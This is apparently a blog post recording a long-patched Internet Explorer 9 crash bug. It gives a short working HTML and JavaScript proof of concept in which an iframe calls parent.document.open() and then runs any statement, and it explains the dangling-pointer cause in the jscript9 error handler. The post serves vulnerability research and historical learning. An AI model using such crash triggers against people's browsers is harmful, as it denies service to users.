IE9 DoS: parent.document.open from an iFrame

This was a concise one. Calling parent.document.open() from inside an iFrame and then immediately executing any JavaScript instruction caused the browser to crash. The instruction after the document.open() call does not even need to be meaningful — assigning 1 to a variable is enough.

<iframe name="iFrame" width="400" height="80"></iframe>

<script language="JavaScript">
iFrame.document.write('<center><input type="button" onclick="parent.document.open(); a = 1;" value="CrashMe!"></center>');
iFrame.document.close();
</script>

The crash occurs in jscript9!ScriptEngine::OnScriptError when the engine tries to report the error condition that follows the document open. The document.open() call tears down the parent’s script environment while the iFrame’s script is still running, leaving a dangling pointer that the error handler then dereferences. Exploitability was classified as UNKNOWN.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9: iFrame URL Inconsistency on Refresh After DOM Insertion] :: [IE9 UXSS: Generate Error to Grab the Error Handler's Caller Function] >